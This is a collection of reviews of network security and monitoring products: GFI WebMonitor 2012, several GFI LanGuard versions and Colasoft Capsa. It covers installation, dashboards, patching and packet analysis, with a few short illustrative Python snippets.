We tested it in an average company with a typical mix of PCs, laptops and mobile clients (phones), running on a basic ADSL internet connection and a dual-core Windows 2003 Server box that was doing everything, including acting as the domain controller and the print server in its spare time, and we were happy to confirm there was no noticeable performance impact on the server.

Installing GFI WebMonitor 2012

As usual with GFI we downloaded the fully functional 30-day evaluation copy (82Mb) and received the license key minutes later by email. On running the installer we found our humble server lacked several prerequisites but happily the installer went off and collected them without any fuss.

review-gfi-webmonitor2012-1

After that it offered to check for updates to the program, another nice touch:


The next screen is where you decide how you want to implement the product. Having just a single server with a single network card we chose single proxy mode:

review-gfi-webmonitor2012-3

With those choices made the installation itself was surprisingly quick and before long we were looking at this important screen:

review-gfi-webmonitor2012-4

We reconfigured several user PCs to point to our newly-created http proxy and they were able to surf as if nothing had happened. Except, of course, for the fact that we were now in charge!

We fired off a number of web accesses (to www.Firewall.cx of course, among others) and some searches, then clicked Finish to see what the management console would give us.

WebMonitor 2012 - The All-Seeing Eye

The dashboard overview (above) displays a wealth of information. At a glance you can see the number of sites visited and blocked along with the top users, top domains and top categories (more on these later).  There’s also a useful trending graph which fills up over time, and you can change the period being covered by the various displays using the controls in the top right-hand corner. The console is also web-based so you can use it remotely.

review-gfi-webmonitor2012-5

Many of the displays are clickable, allowing you to easily drill down into the data, and if you hover the mouse you’ll get handy pop-up explanations. We were able to go from the overview to the detailed activities of an individual user with just a few clicks. A user here is a single source IP, in other words a particular PC rather than the person using it. Ideally we would have liked the product to query the Active Directory domain controller and nail down the actual logged-on user, but to be honest, given the reasonable price and the product’s undoubted usefulness, we’re not going to quibble.

The other dashboard tabs help you focus on particular aspects. The Bandwidth tab (shown below) and the activity tab let you trend the activity either by data throughput or the number of sessions as well as giving you peaks, totals and future projections. The real-time traffic tab shows all the sessions happening right now and lets you kill them, and the quarantine tab lists the internet nasties that WebMonitor has blocked.

review-gfi-webmonitor2012-6

To the right of the dashboard, the reports section offers three pages of ad-hoc and scheduled reports that you can either view interactively or have emailed to you. You can pretty much get anything here: the bandwidth wasted by non-productive surfing during a time period; the use of social networking sites and/or webmail; the search engine activity; the detailed activity of a particular user and even the use of job search websites on company time.

review-gfi-webmonitor2012-7

Underlying all this is a huge database of site categories. This, along with the malware protection, is maintained by GFI and downloaded daily by the product as part of your licensed support so you’ll need to stay on support moving forward if you want this to remain up to date.

The Enforcer

Monitoring, however, is only half the story and it’s under the settings section that things really get interesting.  Here you can configure the proxy (it can handle https if you give it a certificate and it also offers a cache) and a variety of general settings but it’s the policies and alerts that let you control what you’ve been monitoring.

review-gfi-webmonitor2012-8

By defining policies you can restrict or allow all sorts of things, from downloading to instant messaging to categories of sites allowed or blocked and any time restrictions. Apply the relevant policies to the appropriate users and there you go.

The policies are quite detailed. For example, here’s the page allowing you to customise the default download policy. Using the scrolling list you can restrict a range of executables, audio/video files, document types and web scripts, and if the default rules don’t meet your needs you can create your own. You can block them, quarantine them and generate an alert if anyone tries to do what you’ve forbidden (a rough sketch of the idea follows the screenshot below).

review-gfi-webmonitor2012-9
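To give a flavour of what such a download policy evaluates, here is a purely illustrative sketch of extension-based classification with block, quarantine and allow outcomes. The extension lists and actions are our own examples and bear no relation to GFI’s actual rule engine.

# Purely illustrative: classify a requested download by file extension and decide
# an action, in the spirit of a download-control policy (not GFI's rule engine).
from pathlib import Path

BLOCKED = {".exe", ".msi", ".vbs", ".js"}          # executables and web scripts
QUARANTINED = {".zip", ".rar"}                     # hold archives for inspection

def download_action(url_path: str) -> str:
    ext = Path(url_path).suffix.lower()
    if ext in BLOCKED:
        return "block-and-alert"
    if ext in QUARANTINED:
        return "quarantine"
    return "allow"

for path in ("/files/setup.exe", "/docs/report.pdf", "/archive/stuff.zip"):
    print(path, "->", download_action(path))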

Also, hidden away under the security heading is the virus scanning policy. This is really nice - GFI WebMonitor can scan incoming files for you using several anti-virus, spyware and malware detectors and will keep these up to date. This is the part of the program that generates the list of blocked nasties we mentioned earlier.

Pull down the monitoring list and you can set up a range of administrator alerts ranging from excessive bandwidth through attempted malware attacks to various types of policy transgression. By using the policies and alerts together you can block, educate or simply monitor across the whole spectrum of internet activity as you see fit.

review-gfi-webmonitor2012-10

Final Thoughts

GFI WebMonitor is a well thought-out, tightly focussed and well integrated product that provides everything a small to large-sized enterprise needs to monitor and control internet access at a reasonable price. You can try it for free, and the per-seat licensing model means you can scale it as required. It comes with great documentation, both for reference and to guide you as you begin to take control.

 


Product Review - GFI LanGuard Network Security Scanner 2011

review-gfi-languard2011-badge
Review by Alan Drury and John Watters

Introduction

With LanGuard 2011 GFI has left behind its old numbering system (this would have been Version 10), perhaps in an effort to tell us that this product has now matured into a stable and enterprise-ready contender worthy of serious consideration by small and medium-sized companies everywhere.

Well, after reviewing it we have to agree.

In terms of added features the changes here aren’t as dramatic as they were between say Versions 8 and 9, but what GFI have done is to really consolidate everything that LanGuard already did so well, and the result is a product that is rock-solid, does everything that it says on the tin and is so well designed that it’s a joy to use.

Installation

As usual for GFI we downloaded the fully-functional evaluation copy (124Mb) from its website and received our 30-day trial licence by email shortly afterwards. Permanent licences are reasonably priced and on a sliding scale that gets cheaper the more target IP addresses you want to scan. You can discover all the targets in your enterprise but you can only scan the number you’re licensed for.

Installation is easy. After you select your language, the installer checks your system to make sure it’s up to the job:

review-gfi-languard-2011-1
The installer will download and install any prerequisites you’re missing, but it’s worth noting that if you’re on a secure network with no internet access you’ll have to obtain them yourself.

Once your licence is in place the next important detail is the user account and password LanGuard will use to access and patch your machines. We’d suggest a domain account with administrator privileges to ensure everything runs smoothly across your whole estate. And, as far as installation goes, that’s pretty much it.

Scanning

LanGuard opened automatically after installation and we were delighted to find it already scanning our host machine:

review-gfi-languard-2011-2

The home screen (above) shows just how easy LanGuard is to use. All the real-world tasks you’ll need to do are logically and simply accessible and that’s the case all the way through. Don’t be deceived, though; just because this product is well-designed doesn’t mean it isn’t also well endowed.

Here’s the first treasure – as well as scanning and patching multiple versions of Windows, LanGuard 2011 interfaces with other security-significant programs. Here it is berating us for our archaic versions of Flash Player, Java, QuickTime and Skype:

review-gfi-languard-2011-3

This means you can take, from just one tool, a holistic view of the overall security of your desktop estate rather than just a narrow check of whether or not you have the latest Windows service packs. Anti-virus out of date? LanGuard will tell you. Die-hard user still on an older browser? You’ll know. And you can do something about it.

Remediation

Not only will LanGuard tell you what’s missing; if you click on Remediate, down in the bottom right of the screen, you can ask the product to go off and fix it. And yes, that includes the Java, antivirus, Flash Player and everything else:

review-gfi-languard-2011-4

Want to deploy some of the patches but not all? No problem. And would you like it to happen during the dark hours? LanGuard can do that too, automatically waking up the machines, shutting them down again and emailing you with the result. Goodness, we might even start to enjoy our job!

LanGuard can auto-download patches, holding them ready for use like a Windows Server Update Services (WSUS) server, or it can go and get them on demand. We just clicked Remediate and off it went, downloaded our updated Adobe AIR and installed it without any fuss in just a couple of minutes.

Agents and Reports

Previous versions of LanGuard were ‘agentless’, with the central machine scanning, patching and maintaining your desktop estate over the network. This was fine but it limited the throughput and hence what could be achieved in a night’s work. While you can still use it like this, LanGuard 2011 also introduces a powerful agent-based mode. Install the agent on your PCs (it supports all the current versions of Windows) and they will do the work while your central LanGuard server merely gives the orders and collects the results. The agents give you a lot of power; you can push-install them without having to visit every machine, and even if a laptop strays off the network for a while its agent will report in when it comes back. This is what you’d expect from a scalable, enterprise-credible product and LanGuard delivers it in style.

The reports on offer are comprehensive and nicely presented. Whether you just want a few pie charts to convince your boss of the value of your investment or you need documentary evidence to demonstrate PCI DSS compliance, you’ll find it here:

review-gfi-languard-2011-5

A particularly nice touch is the baseline comparison report; you define one machine as your baseline and LanGuard will then show you how your other PCs compare to it, what’s missing and/or different:

review-gfi-languard-2011-6

Other Features

What else can this thing do? Well there’s so much it’s hard to pick out the best points without exceeding our word limit, but here are a few of our favourites:

  • A comprehensive hardware audit of all the machines in your estate, updated regularly and automatically, including details of the removable USB devices that have been used
  • An equally comprehensive and automatic software audit, broken down into useful drag-and-drop categories, so you’ll always know exactly who has what installed. And this doesn’t just cover applications but all the extras like Java, Flash, antivirus and antispyware as well
  • The ability to define programs and applications as unauthorised, which in turn allows LanGuard to tell you where they are installed, alert you if they get installed and – oh joy – automatically remove them from users’ machines
  • System reports including things like the Windows version, shared drives, processes, services and local users and groups including who logged on and when
  • Vulnerability reports ranging from basic details like open network ports to detected vulnerabilities with their corresponding OVAL and CVE references and hyperlinks for further information
  • A page of useful tools including SNMP walk, DNS lookup and enumeration utilities

Conclusion

We really liked this product. If you have a shop full of Windows desktops to support and you want complete visibility and control over all aspects of their security from just one tool then LanGuard 2011 is well worth a look. The real-world benefits of a tool like this are undeniable, but the beauty of LanGuard 2011 is in the way those benefits are delivered. GFI has drawn together all the elements of this complicated and important task into one seamless, intuitive and comprehensive whole and left nothing out, which is why we’ve given LanGuard 2011 the coveted Firewall.cx 10/10 award.

 


GFI Languard Network Security Scanner V9 Review

With Version 9, GFI's Network Security Scanner has finally come of age. GFI has focussed the product on its core benefit – maintaining the security of the Windows enterprise – and the result is a powerful application that offers real benefits for the time-pressed network administrator.

Keeping abreast of the latest Microsoft patches and Service Packs, regular vulnerability scanning, corrective actions, software audit and enforcement in a challenging environment can really soak up your time. Not any more though – install Network Security Scanner and you can sit back while all this and more happens automatically across your entire estate.

The user interface for Version 9 is excellent; so intuitive, in fact, that we didn’t touch the documentation at all yet managed to use all of the product’s features. Each screen leads you to the next so effectively that you barely need to think about what you are doing, and using the product quickly becomes second nature.

Version 8 was good, but with Version 9 GFI has done it again.

Installation

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

The Interface

The separate toolbar scheduler from Version 8 is gone and, in its place, the opening screen gives you all the options you need: Scan this Computer, Scan the Network, Custom Scan or Scheduled Scan. Click ‘Scan this Computer' and the scan begins – just one simple mouse click and you're off.

reviews-gfi-languard-v9-1

Performance and Results

Scanning speed is just as good as Version 8 and in less than two minutes we had a summary of the results:

reviews-gfi-languard-v9-2

Simply look below the results summary and the handy Next Steps box (with amusing typographical error) leads you through the process of dealing with them.

The prospect of Analizing the results made our eyes water so, having taken care to protect our anatomy from any such unwarranted incursion, we clicked the link:

reviews-gfi-languard-v9-3

The scan results are grouped by category in the left column with details to the right. Expand the categories and you get a wealth of information.

The vulnerabilities themselves are described in detail with reference numbers and URLs to lead you to further resources, but that's not all. You also get the patch status of the scanned system, a list of open ports, a comprehensive hardware report, an inventory of the installed software and a system summary. Think of all this in terms of your enterprise – if you have this product scanning all your machines you can answer questions such as “Which machines are still on Service Pack 2?” or “How much memory is in each of the Sales PCs?” or “What software does Simon have installed on his laptop?” without going anywhere else. It's all there for you at the click of a mouse.

There are other gems here as well, too many to list but here are some of our favourites. Under Potential Vulnerabilities the scanner lists all the USB devices that had been connected so we could monitor the historical use of memory sticks and the like. And the software audit, useful in itself, held another delight. Right click on any software entry and you can tell the scanner to uninstall it, either from just this machine or from all the machines in the network. Go further and define a list of banned applications and the product will remove them for you, automatically, when it runs its regular scan. Imagine the face of that wayward user each morning …

Patch Deployment

Choose the Remediate link and you'll head off to the part of the product that installs patches and service packs. Needless to say, these can be downloaded for you from Microsoft as they are released and held by the product, ready for use:

reviews-gfi-languard-v9-4

You can either let the scanner automatically install whatever patches and service packs it finds missing or you can vet and release patches you want to allow. This will let you block the next release of Internet Explorer, for example, while allowing other critical patches through. You can also uninstall patches and service packs from here.

As in Version 8, you can also deploy custom software to a single machine or across your estate. In a nutshell, if it is executable or can be opened then you can deploy it. As a test we pushed a picture of a pair of cute kittens to a remote machine where the resident graphics program popped open to display them. You can install software just as easily provided the install needs no user intervention:

reviews-gfi-languard-v9-5

reviews-gfi-languard-v9-6

Alerts and Reporting

This is where GFI demonstrates it is serious about positioning this product as a robust and reliable enterprise-ready solution.

Firstly the scanner can email you the results of its nocturnal activities so all you have to do each morning is make yourself a coffee and check your inbox. We'd have liked to see this area expanded, perhaps with definable events that could trigger an SMS message, SNMP trap or a defined executable. Maybe in Version 10?

To convince your manager of the wisdom of your investment there is a good range of coloured charts, and if you have the GFI Report Manager framework the product slots right into it, so you can generate detailed custom reports from the back-end database.

reviews-gfi-languard-v9-7

And speaking of the database, GFI has now provided maintenance options so you can schedule backups and perform management tasks from within the scanner itself; a good idea for a key application.

Subscribe to what?

A vulnerability scanner is only any good, of course, if it can be automatically updated with the latest exploits as they come out. GFI has changed the business model with Version 9, so you’ll be expected to shell out a modest annual fee for a Software Maintenance Agreement (SMA), unlike Version 8 where you paid in full and updates were free thereafter.

A nag screen reminds you when your subscription runs out so you needn't worry about not noticing:

reviews-gfi-languard-v9-8

Conclusion

What more can we say? If you have an estate of Windows machines to secure and maintain then this is what you have been looking for. It does everything you might need and more, it's easy to use and delivers real-world benefits.


Colasoft Capsa v7.2.1 Network Analyser Review

Using network analysing software, we are able to monitor our network and dig into the various protocols to see what’s happening in real time. This can help us better understand the theoretical knowledge we’ve obtained throughout the years but, most importantly, it helps us identify, troubleshoot and fix network issues that we otherwise wouldn’t be able to resolve.

A quick search on the Internet will surely reveal many network analysers, making it very confusing to select one. Some provide basic functions, such as packet sniffing, making them ideal for simple tasks, while others give you all the necessary tools and functions to ensure your job is done in the best possible way.

Colasoft's network analyser is a product that falls into the second category. We had the chance to test drive the Colasoft Network Analyser v7.2.1, which is the latest available version at the time of writing.

Having used previous versions of Colasoft's network analyser, this latest version we tested left us impressed and does, in fact, promise a lot no matter what the environment demands.

The Software

Colasoft's Capsa network analyser is available as a demo version directly from their website www.colasoft.com. We quickly downloaded the 21.8MB file and began the installation, which was a breeze. Being small and compact, the whole process didn't take more than 30-40 seconds.

We fired up the software, entered our registration details, activated our software and up came the first screen which shows a completely different philosophy to what we have been used to:

reviews-colasoft-1

Before you even start capturing packets and analysing your network, you're greeted with a first screen that allows you to select the network adaptor to be used for the session, while allowing you to choose from a number of preset profiles regarding your network bandwidth (1000, 100, 10 or 2 Mbps).

Next, you can select the type of analysis you need to run for this session ranging from Full analysis, Traffic Monitoring, Security analysis to HTTP, Email, DNS and FTP analysis. The concept of pre-configuring your packet capturing session is revolutionary and very impressive. Once the analysis profile is selected, the appropriate plug-in modules are automatically loaded to provide all necessary information.

For our review, we selected the ‘100Mb Network’ profile and ‘Full Analysis’ profile, providing access to all plug-in modules, which include ARP/RARP, DNS, Email, FTP, HTTP and ICMPv4 – more than enough to get any job done!

Optionally, you can use the ‘Packet Filter Settings’ section to apply filters to the packets that will be captured:

reviews-colasoft-2

The Main Dashboard

As soon as the program loaded its main interface, we were left surprised with the wealth of information and options provided.

The interface is broken into four sections: tool bar, node explorer, dashboard and online resource. The node explorer (left lower side) and online resource (right lower side) section can be removed, providing the dashboard with the maximum possible space to view all information related to our session.

reviews-colasoft-3

The menu provided allows the configuration of the program, plus access to four additional tools: Ping, Packet Player, Packet Builder and MAC Scanner.

To uncover the full capabilities of the Colasoft Capsa Network Analyser, we decided to proceed with the review by breaking down each of the four sections.

The ToolBar

The toolbar is populated with a number of options and tools that proved extremely useful and are easily accessible. As shown below, it too is broken into smaller sections, allowing you to control the start/stop function of your capturing session, filters, and the network profile settings, from where you can set your bandwidth, profile name, alarms and much more.

reviews-colasoft-4

The Analysis section is populated with some great features we haven't found in other similar tools. Here, you can enable or disable the built-in ‘diagnosis settings’ for over 35 different protocols and TCP/UDP states.

reviews-colasoft-5

When selecting a diagnosis setting, Colasoft Capsa will automatically explain, in the right window, what the setting shows and the impact on the network. When done, click on the OK button and you're back to the main capturing screen.

The Analysis section also allows you to change the buffer size in case you want to capture packets for an extended period of time and, even better, you can enable the ‘auto packet saving’ feature which will automatically save all captured packets to your hard drive, making them available whenever you need them.

Right next to the Analysis section are the 'Network Utilisation' and 'pps' (packets per second) gauges, followed by the 'Traffic History Chart'. These nifty gauges show, in almost real time, the utilisation of your network card according to the network profile you selected earlier, plus any filters that may have been applied.

For example, if a 100Mbps network profile was selected, the gauges will represent the utilisation of a 100Mbps network card. If, in addition, filters were selected, e.g. HTTP, then both gauges will represent 100Mbps network utilisation only for the HTTP protocol. So if there were a large email or FTP download, it wouldn't register on the gauges, as they only show utilisation for HTTP traffic, according to the filter.

To give the gauges a try, we disabled all filters and started a 1.4GB file transfer between our test bed and server over our 100Mbps network. Utilisation hit the red areas while the pps remained at around 13,000 packets per second.

reviews-colasoft-6

The gauges are almost realtime as they are updated once every second, though we would have loved to see them swinging left-right in real time. One issue we encountered was that the 'Traffic History Chart' seemed to chop off the bandwidth value when moving our cursor toward the top of the graph. This is evident in our screenshot where the value shown is 80.8Mbps, and makes it almost impossible to use the history chart when your bandwidth is almost 100% utilised. We hope to see this fixed in the next version.
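As a rough sanity check on those gauge readings, the arithmetic below shows how a packet rate and an average frame size translate into utilisation against the selected 100Mbps profile. The 960-byte average frame size is our own assumption for a bulk file transfer, not a figure reported by Capsa.

# Illustration of how a utilisation gauge relates filtered traffic to the profile bandwidth.
def utilisation_percent(bytes_per_second: float, profile_mbps: float) -> float:
    bits_per_second = bytes_per_second * 8
    return 100.0 * bits_per_second / (profile_mbps * 1_000_000)

# Example: ~13,000 packets/s of roughly 960-byte frames on a 100Mbps profile
# works out to almost full utilisation, matching the gauge hitting the red area.
print(round(utilisation_percent(13_000 * 960, 100), 1), "%")   # ~99.8 %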

At the very end of the toolbar, the 'Packet Buffer' provides visual feedback on how full the buffer actually is, plus there are a few options to control the packet buffer for that session.

Node Explorer & DashBoard

In the lower left area we find the 'Node Explorer', which works in conjunction with the main dashboard to provide the information for our captured session. The Node Explorer is actually a very smart concept as it allows you to instantly filter the captured information.

The Node Explorer starts populating the segmented areas automatically as it captures packets on the network. It provides a nice break-down of the information using a hierarchical approach that also follows the OSI model.

As we noticed, we could choose to select the Physical Explorer that contained nodes with MAC Addresses, or select the IP Explorer to view information about nodes based on their IP Address.

Each of these sections is then further broken down as shown. A nice, simple and effective way to categorise the information and help the user find what is needed without searching through all captured packets.

Once we made a selection (Protocol Explorer/Ethernet II/IP (5), as shown below), the dashboard next to it provided up to 13 tabs of information, which are analysed in the next screenshot.

reviews-colasoft-7

With the IP entry selected, the Protocol tab in the main dashboard provided a wealth of information, and we were quickly able to view the quantity of packets, the type and amount of traffic, and other critical information for the duration of our session.

We identified our Cisco Call Manager Express music-on-hold streaming under UDP/SCCP, which consumes almost 88Kbps of bandwidth, an SNMP session which monitors a remote router accounting for 696bps of traffic, and lastly the ICMP tracking of our website, costing us another 1.616Kbps of traffic. Altogether, 89.512Kbps.

reviews-colasoft-8

This information is automatically updated every second and you can customise the refresh rate from 10 presets. One function we really loved was the fact we could double-click on any of the shown protocols and another window would pop up with all packets captured for the selected protocol.

We double-clicked on the OSPF protocol (second last line in the above screenshot) to view all packets related to that protocol and here is what we got:

reviews-colasoft-9

Clearly there is no need to use filters, as we probably would in other similar types of software, thanks to the smart design of the Node Explorer and Dashboard. Keep in mind that if we need all packets saved, we will need an appropriately sized buffer; otherwise the buffer is recycled as expected.
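That 'recycling' is essentially a ring buffer: once the buffer fills, the oldest packets are discarded to make room for new ones. A minimal sketch of the concept (not Capsa's internals) follows.

# Minimal ring-buffer sketch: when the capture buffer is full, the oldest
# packets are discarded to make room for new ones (the "recycling" above).
from collections import deque

capture_buffer = deque(maxlen=5)       # tiny buffer for illustration
for packet_id in range(8):
    capture_buffer.append(f"packet-{packet_id}")

print(list(capture_buffer))            # packets 3..7 remain; 0..2 were recycled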

Going back to the main area, any user will realise that the dashboard area is where Colasoft's Capsa truly excels and unleashes its potential. The area is smartly broken into a tabbed interface and each tab does its own magic:

reviews-colasoft-10

The user can quickly switch between any tabs and obtain the information needed without disrupting the flow of packets captured.

Let's take a quick look at what each tab offers:

Summary Tab

The Summary tab is an overview of what the network analyser 'sees' on the network.

reviews-colasoft-11

We get brief statistics on the total amount of traffic we've seen, regardless of whether it’s been captured or not, the current network utilisation, bits per second and packets per second, plus a breakdown of the packet sizes we've seen so far. Handy information if you want to optimise your network according to your network packet size distribution.

Diagnosis Tab

The Diagnosis tab is truly a goldmine. Here you'll see all the information related to problems automatically detected by Colasoft Capsa, without any additional effort!

This amazing section is broken up into the Application layer, Transport layer and Network layer (not shown). Capsa will break down each layer in a readable manner and show all related issues it has detected.

reviews-colasoft-12

Once a selection has been made – in our example we chose 'Application layer / DNS Server Slow Response' – the lower area of the window brings up a summary of all the related packets in which this issue was detected.

Any engineer who spends hours trying to troubleshoot network issues will truly understand the power and usefulness of this feature.

Protocol Tab

The Protocol tab provides an overview and break-down of the IP protocols on the network, along with other useful information as shown previously in conjunction with the Node Explorer.

reviews-colasoft-13

Physical Endpoint Tab

The Physical Endpoint tab shows conversations from physical nodes (MAC addresses). Each node expands to reveal its IP address, helping to track the traffic. Similar statistics regarding the traffic are also shown:

reviews-colasoft-14

As with previous tabs, when selecting a node the physical conversation window opens right below and shows the relevant conversations along with their duration and total traffic.

IP Endpoint Tab

The IP Endpoint tab offers similar information but on the IP Layer. It shows all local and Internet IP addresses captured along with statistics such as number of packets, total bytes received, packets per second and more.

reviews-colasoft-15

When selecting an IP Address, Capsa will show all IP, TCP and UDP conversations captured for this host.

IP Conversation Tab

The IP Conversation tab will be useful to many engineers. It allows the tracking of conversations between endpoints on your network, assuming all traffic passes through the workstation where the Capsa Network Analyser is installed.

The tab will show individual sessions between endpoints, duration, bytes in and out from each end plus a lot more.

reviews-colasoft-16

Network engineers can use this area to troubleshoot problematic sessions between workstations, servers and connections toward the Internet. Clicking on a specific conversation will show all TCP and UDP conversations between the hosts, allowing further analysis.

Matrix Tab

The Matrix tab is an excellent function probably only found on Colasoft's Capsa. The matrix shows a graphical representation of all conversations captured throughout the session. It allows the monitoring of endpoint conversations and will automatically resolve endpoints when possible.

reviews-colasoft-17

Placing the mouse over one of the lines causes Capsa to automatically show all relevant information about the conversations between the two hosts. Active conversations are highlighted in green, multicast sessions in red and the selected session in orange.

The menu on the left allows more options so an engineer can customise the information.

Packet Tab

The Packet tab gives access to the packets captured on the network. The user can lock the automatic scrolling, or release it so new packets are shown as they are captured, or have the program continue capturing packets without scrolling the packet window. This allows easy access to older packets without the window jumping for every new packet captured.

Even though the refresh time is customisable, the fastest refresh rate was only every 1 second. We would prefer a 'realtime' refresh rate and hope to see this implemented in the next update.

reviews-colasoft-18

Log Tab

The Log tab offers information on sessions related to specific protocols such as DNS, Email, FTP and HTTP. It's a good option to have, but we found little value in it since all other features of the program fully cover the information provided by the Log tab.

reviews-colasoft-19

 

Report Tab

The Report tab is yet another useful feature of Colasoft's Capsa. It allows the generation of a network report covering all the captured packets and can be customised to a good extent. The program allows the engineer to insert a company logo and name, plus customise a few more fields.

The report offers quite a few options, the most important being the Diagnosis and Protocol statistics.

reviews-colasoft-20

Finally, the report can be exported to PDF or HTML format to distribute it accordingly.

Professionals can use this report to provide evidence of their findings to their customers, making the job look more professional and saving hours of work.

Online Resource

The 'Online Resource' section is a great resource to help the engineer get the most out of the program. It contains links and live demos that show how to detect ARP poisoning attacks, ARP Flooding, how to monitor network traffic efficiently, track down BitTorrents and much more.

Once the user becomes familiar with the software, they can choose to close this section, giving its space back to the rest of the program.

Final Conclusion

Colasoft's Capsa Network Analyser is without doubt a goldmine. It offers numerous enhancements that make it pleasant to work with and easy for anyone to find the information they need. Its unique functions such as the Diagnosis, Matrix and Reports surely make it stand out and can be invaluable for anyone troubleshooting network errors.

While the program is outstanding, it could do with some minor enhancements, such as real-time presentation of packets, more thorough network reports and an improved traffic history chart. Future updates will also need to include a 10Gbit option amongst the available network profiles.

We would definitely advise any network administrator or engineer to give it a try and see for themselves how great a tool like Capsa can be.


GFI Languard Network Security Scanner V8

Can something really good get better? That was the question that faced us when we were assigned to review GFI's Languard Network Security Scanner, Version 8 , already well loved (and glowingly reviewed) at Version 5.

All vulnerability scanners for Windows environments fulfil the same basic function, but as the old saying goes “It's not what you do; it's the way that you do it”. GFI have kept all the good points from their previous releases and built on them; and the result is a tool that does everything you would want with an excellent user interface that is both task efficient and a real pleasure to use.

Installation

Visit GFI's website and you can download a fully-functional version that you can try before you buy; for ten days if you prefer to remain anonymous or for thirty days if you swap your details for an evaluation code. The download is 32Mb expanding to 125Mb on your disk when installed.

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

First of all, if you have a license key you can enter it during installation to save time later – just a little thing, but it shows this software has been designed in a very logical manner.

You're then asked for an account to run the Attendant service, the first of the Version 8 enhancements. This, as its name suggests, is a Windows service that sits in your system tray and allows you easy access to the program and its documentation plus a handy window that lets you see everything the scanner is doing as it works away in the background.

reviews-gfi-languard-v8-1

After this you're asked whether you'd like your scan results stored in Microsoft Access or SQL Server (2000 or higher). This is another nice feature, particularly if you're using the tool to audit, patch and secure an entire infrastructure.

One feature we really liked is the ability to run unattended scheduled scans and email the results. This is a feature you won't find in any other similar product.

GFI's LANguard scanner doesn't just find vulnerabilities, it will also download the updates that fix them and patch your machines for you.

Finally, you can tell the software where to install itself and sit back while the installation completes.

Getting Started

Each time you start the scanner it checks with GFI for more recent versions and for updated vulnerabilities and patches. You can turn this off if you don't always have internet access.

You'll also get a wizard to walk you through the most common scanning tasks. This is great for new users and again you can turn it off once you become familiar with the product.

reviews-gfi-languard-v8-2

The Interface

Everything takes place in one uncluttered main screen as shown below. As our first review task we closed the wizard and simply ‘had a go' without having read a single line of documentation. It's a testament to the good design of the interface that within a few mouse clicks we were scanning our first test system without any problems.

reviews-gfi-languard-v8-3

The left hand pane contains the tools, menus and options available to you. This is split over three tabs, an improvement over Version 5 where everything sat in one huge list. To the right of this are two panes that display the information or settings relating to the option you've chosen, and the results the product has obtained. Below them is a results pane that shows what the scanner is up to, tabbed again to let you view the three scanner threads or the overall network discovery.

Performance and Results

It's fast. While performance obviously depends on your system and network we were pleasantly surprised by the efficiency and speed of the scan.

Speed is nothing however without results, and the product doesn't disappoint. Results are logically presented as an expanding tree beneath an entry for each scanned machine. Select one of the areas in the left pane and you'll get the detail in the right pane. Right-click there and you can take appropriate action; in the example shown right-clicking will attempt a connection on that port:

reviews-gfi-languard-v8-4

Vulnerabilities are similarly presented with rich and helpful descriptions, while references for further information from Microsoft and others plus the ability to deploy the relevant patches are just a right-click away:

reviews-gfi-languard-v8-5

The scanner is also surprisingly resilient. We decided to be mean and ran a scan of a desktop PC on a large network – via a VPN tunnel within a VPN tunnel across the public internet with an 11Mb/s wireless LAN connection on the other end. The scan took about ten minutes but completed fine.

Patch Deployment

Finding vulnerabilities is only half the story; this product will also help you fix them. One click at the machine level of the scan results opens yet another helpful screen that gathers all your options in one place. You can elect to remotely patch the errant machine, shut it down or even berate the operator, and a particularly nice touch is the list of your top five most pressing problems:

reviews-gfi-languard-v8-6

Patch deployment is similarly intuitive. The product can download the required patches for you, either now or at a scheduled time, and can access files already downloaded by a WSUS server if you have one. Once you have the files available you can patch now or schedule the deployment, and either way installation is automatic.

Alongside this is another Version 8 feature which gives you access to the same mechanism to deploy and install software of your choice. We tested this by push-installing some freeware tools, but all you need is a fully scripted install for unattended installation and you can deploy anything you like out to your remote machines. This is where the Attendant Service comes in again as the tray application provides a neat log of what's scheduled and what's happened. The example shows how good the error reporting is (we deliberately supplied the wrong credentials):

reviews-gfi-languard-v8-7

This powerful feature is also remarkably configurable – you can specify where the copied files should go, check the OS before installation, change the user credentials (important for file system access and for push-installing the Patch Agent service), reboot afterwards or even seek user approval before going ahead. We've used other tools before for software deployment and we felt right at home with the facilities here.

Scripting and Tools

Another plus for the busy administrator is the facility to schedule scans to run when you'd rather be away doing something else. You can schedule a simple timed scan and have the results emailed to you, or you can set up repeating scans and have the product compare the current results with the previous and only alert you if something has changed. If you don't want your inbox battered you can sleep soundly knowing you can still consult the database next morning to review the results. And if you have mobile users your group scan (or patch) jobs can stay active until your last elusive road warrior has appeared on the network and been processed. Resistance is futile!
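The 'only alert me if something changed' workflow is easy to picture. The sketch below shows the general idea of diffing two result sets and notifying only on differences; it is a generic illustration rather than GFI's implementation, and the result format and notify() hook are hypothetical.

# Generic sketch: compare the latest scan results with the previous run and
# report only what changed. The dict format and notify() are hypothetical.
def diff_scans(previous: dict, current: dict) -> dict:
    """Each dict maps a host name to a set of finding identifiers."""
    changes = {}
    for host in set(previous) | set(current):
        new_findings = current.get(host, set()) - previous.get(host, set())
        resolved = previous.get(host, set()) - current.get(host, set())
        if new_findings or resolved:
            changes[host] = {"new": sorted(new_findings), "resolved": sorted(resolved)}
    return changes

def notify(changes: dict) -> None:
    if not changes:
        return                       # nothing changed - keep the inbox quiet
    for host, delta in changes.items():
        print(f"{host}: {len(delta['new'])} new, {len(delta['resolved'])} resolved findings")

# Example run
previous = {"pc-01": {"MS08-067"}, "pc-02": {"open-port-23"}}
current = {"pc-01": set(), "pc-02": {"open-port-23", "weak-snmp-community"}}
notify(diff_scans(previous, current))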

Under the Tools tab there are a few more goodies including an SNMP audit to find insecure community strings. This was the site of our only disappointment with the product – we would have liked the ability to write our own tools and add them in here, but it seemed we'd finally found something GFI hadn't thought of.

reviews-gfi-languard-v8-8

Having said that, all the other scripting and tweaking facilities you'd expect are there, including a comprehensive command-line interface for both scanning and patch deployment and the ability to write custom vulnerability definitions in VBScript. All this and more is adequately documented in the well-written on-line help and user manual, and if you're still stuck there's a link to GFI's knowledgebase from within the program itself.

Summary

We were really impressed by this product. GFI have done an excellent job here and produced a great tool which combines vulnerability scanning and patch management, with heavyweight features and an excellent user interface that is a joy to work with.


Acunetix Web Vulnerability Scanner

The biggest problem with testing web applications is scalability. With the addition of even a single form or page to test, you invariably increase the number of repetitive tasks you have to perform and the number of relationships you have to analyze to figure out whether you can identify a security issue.

